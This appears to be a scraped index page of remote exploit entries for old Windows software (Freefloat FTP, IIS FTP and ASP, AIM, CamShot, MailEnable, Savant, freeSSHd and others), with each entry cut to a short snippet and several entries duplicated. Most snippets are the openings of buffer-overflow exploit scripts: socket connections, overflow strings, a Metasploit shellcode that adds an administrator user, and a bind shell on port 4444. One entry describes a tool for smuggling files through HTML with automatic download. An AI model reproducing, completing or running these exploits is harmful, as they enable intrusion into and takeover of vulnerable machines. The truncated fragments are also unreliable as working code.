Freefloat FTP Server 1.0 Buffer Overflow

Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow Date: 08/22/2023 Exploit Author: Waqas Ahmed Faroouqi ZEROXINN Vendor Homepage: http://www.freefoat.com Version: 1.0 Tested on Windows XP SP3 !/usr/bin/python import socket Metasploit Shellcode msfvenom -p...

EmbedInHTML - Embed and hide any file in an HTML file

What this tool does is taking a file any type of file, encrypt it, and embed it into an HTML file as ressource, along with an automatic download routine simulating a user clicking on the embedded ressource. Then, when the user browses the HTML file, the embedded file is decrypted on the fly, save...

Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x

No description provided by source. !/usr/bin/python Exploit Title: Exploit for Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x Date: 29 dec 2009 Author: Emanuele 'emgent' Gentili and Emanuele 'crossbower' Acri Software Link: N/A Version: IIS 5.x/6.x Tested on: Windows 2003 Server SP...

AOL Instant Messenger AIM "Away" Message Remote Exploit

No description provided by source. / CAN-2004-0636 / / AIM Away Message Buffer Overflow Exploit Exploit by John Bissell A.K.A. HighT1mes Exploit: ======== drizzit.c Vulnerable Software: ==================== - AIM 5.5.3588 - AIM 5.5.3590 Beta - AIM 5.5.3591 - AIM 5.5.3595 and a couple others...

CamShot 1.2 - SEH Overwrite Exploit

No description provided by source. CamShot SEH overwrite by tecnik import socket, sys if lensys.argv!=2: print Usage: camshot.py target exit s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connectsys.argv1,80 print Sending Exploit to: + sys.argv1 GET request + overflow string request =GET /...

MailEnable Pro/Ent <= 3.13 (Fetch) post-auth Remote BOF Exploit

No description provided by source. !/usr/bin/perl ================================================================= MailEnable Professional = 3.13 FETCH post-auth buffer overflow ================================================================= Bind Shell POC Exploit for Win2K SP4 pro English Fou...

Easy FTP 1.7.0.11 Buffer Overflow

Exploit Title: Easy FTP Server v1.7.0.11 NLST , NLST -al, APPE, RETR , SIZE and XCWD Commands Remote Buffer Overflow Exploit Date: 10/8/2010 Author: Rabih Mohsen Software Link:http://code.google.com/p/easyftpsvr/downloads/detail?name=easyftp-server-1.7.0.11-cn.zip Version: 1.7.0.11 Tested on:...

CamShot v1.2 SEH Overwrite Exploit

Exploit for unknown platform in category remote exploits ================================== CamShot v1.2 SEH Overwrite Exploit ================================== CamShot SEH overwrite by tecnik import socket, sys if lensys.argv!=2: print "Usage: camshot.py " exit s = socket.socketsocket.AFINET,...

CamShot 1.2 - Overwrite (SEH)

CamShot 1.2 - Overwrite SEH CamShot SEH overwrite by tecnik import socket, sys if lensys.argv!=2: print "Usage: camshot.py " exit s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connectsys.argv1,80 print "Sending Exploit to:" + sys.argv1 GET request + overflow string request ="GET /" request...

CamShot SEH Overwrite Exploit

CamShot SEH overwrite by tecnik import socket, sys if lensys.argv!=2: print "Usage: camshot.py " exit s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connectsys.argv1,80 print "Sending Exploit to:" + sys.argv1 GET request + overflow string request ="GET /" request...

CamShot 1.2 - Overwrite (SEH)

CamShot SEH overwrite by tecnik import socket, sys if lensys.argv!=2: print "Usage: camshot.py " exit s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connectsys.argv1,80 print "Sending Exploit to:" + sys.argv1 GET request + overflow string request ="GET /" request...

Microsoft IIS - ASP Multiple Extensions Security Bypass 5.x/6.x Vulnerabilities

!/usr/bin/python Exploit Title: Exploit for Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x Date: 29 dec 2009 Author: Emanuele 'emgent' Gentili and Emanuele 'crossbower' Acri Software Link: N/A Version: IIS 5.x/6.x Tested on: Windows 2003 Server SP2 CVE : N/A Code :...

MS IIS 5.0/6.0 FTP Server remote overflow vulnerability(win2k)-vulnerability warning-the black bar safety net

IIS 5.0 FTPd / Remote r00t exploit Win2k SP4 targets bug found &exploited by Kingcope, kcope2atgooglemail.com Affects IIS6 with stack cookie protection August 2 0 0 9 - KEEP THIS 0DAY PRIV8 use I:Socket; $|=1; metasploit shellcode, adduser "winown:nwoniw" $sc =...

Microsoft IIS FTP Server Stack Overflow

IIS 5.0 FTPd / Remote r00t exploit Win2k SP4 targets bug found & exploited by Kingcope, kcope2googlemail.com Affects IIS6 with stack cookie protection August 2009 - KEEP THIS 0DAY PRIV8 use IO::Socket; $|=1; metasploit shellcode, adduser "winown:nwoniw" $sc =...

Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)

No description provided by source. IIS 5.0 FTPd / Remote r00t exploit Win2k SP4 targets bug found & exploited by Kingcope, kcope2atgooglemail.com Affects IIS6 with stack cookie protection August 2009 - KEEP THIS 0DAY PRIV8 use IO::Socket; $|=1; metasploit shellcode, adduser "winown:nwoniw" $sc =...

Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)

Exploit for windows platform in category remote exploits ====================================================================== Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit win2k ====================================================================== IIS 5.0 FTPd / Remote r00t...

freeSSHd 1.2.1 - &#039;rename&#039; Remote Buffer Overflow (SEH)

FreeSSHd 1.2.1 rename Remote Buffer Overflow Exploit Advisory: http://www.bmgsec.com.au/advisory/45/ Original: http://www.bmgsec.com.au/advisory/32/ Related : http://www.bmgsec.com.au/advisory/42/ Test box: WinXP Pro SP2 English Exploit code for a vulnerability I discovered sometime ago in FreeSS...

SasCam WebCam Server 2.6.5 ActiveX Remote BOF Exploit

Exploit for unknown platform in category remote exploits ===================================================== SasCam WebCam Server 2.6.5 ActiveX Remote BOF Exploit ===================================================== Sub rootIT puts0m3shit = String8293, "a" eip = unescape"%EC%7E%E3%77" // call...

savant-overflow.txt

!/usr/bin/perl -w exploit for Savant webserver 3.1 remote bof shellcode bind 4444 port on target host Jacopo cervini aka [email protected] use IO::Socket; if!$ARGV1 print "Uso: savant-3.1.pl \n\n"; exit; $victim = IO::Socket::INET-newProto='tcp', PeerAddr=$ARGV0, PeerPort=$ARGV1 or die "can't conne...

Savant 3.1 Get Request Remote Overflow Exploit (Universal)

No description provided by source. !/usr/bin/perl -w exploit for Savant webserver 3.1 remote bof shellcode bind 4444 port on target host Jacopo cervini aka [email protected] use IO::Socket; if!$ARGV1 print "Uso: savant-3.1.pl victim port\n\n"; exit; $victim = IO::Socket::INET-newProto='tcp',...